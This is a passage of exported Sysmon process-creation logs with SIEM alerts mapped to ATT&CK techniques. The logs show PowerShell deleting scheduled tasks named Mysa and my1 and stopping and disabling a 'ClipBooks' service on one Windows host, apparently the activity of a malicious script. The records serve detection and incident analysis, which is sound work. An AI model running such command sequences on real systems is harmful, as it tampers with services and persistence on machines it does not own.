Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.730196300Z"",""eventRecordID"":""3930"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.695\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010ab0a3100}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:38.695"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010ab0a3100}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.638",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.638 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a6073100} +ProcessId: 2872 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.646508700Z"",""eventRecordID"":""3929"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.638\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a6073100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.638"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010a6073100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.594",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.590 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001004033100} +ProcessId: 3952 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.597194700Z"",""eventRecordID"":""3928"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.590\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001004033100}\r\nProcessId: 3952\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.590"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001004033100}"",""processId"":""3952"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.588",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.501 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-001023013100} +ProcessId: 5396 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.514221500Z"",""eventRecordID"":""3927"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.501\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-001023013100}\r\nProcessId: 5396\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.501"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-001023013100}"",""processId"":""5396"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.546",14,"ATT&CK T1064: Windows 
Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.376 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a4fe3000} +ProcessId: 2876 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.382563200Z"",""eventRecordID"":""3926"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.376\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-0010a4fe3000}\r\nProcessId: 2876\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.376"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-0010a4fe3000}"",""processId"":""2876"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.517",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.320 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-00108dfc3000} +ProcessId: 6204 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:38.323668600Z"",""eventRecordID"":""3924"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:38.320\r\nProcessGuid: {df9fc3d3-b416-5ecf-0000-00108dfc3000}\r\nProcessId: 6204\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:38.320"",""processGuid"":""{df9fc3d3-b416-5ecf-0000-00108dfc3000}"",""processId"":""6204"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.503",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:38.291 +ProcessGuid: {df9fc3d3-b416-5ecf-0000-00108efb3000} +ProcessId: 6148 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ClipBooks Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
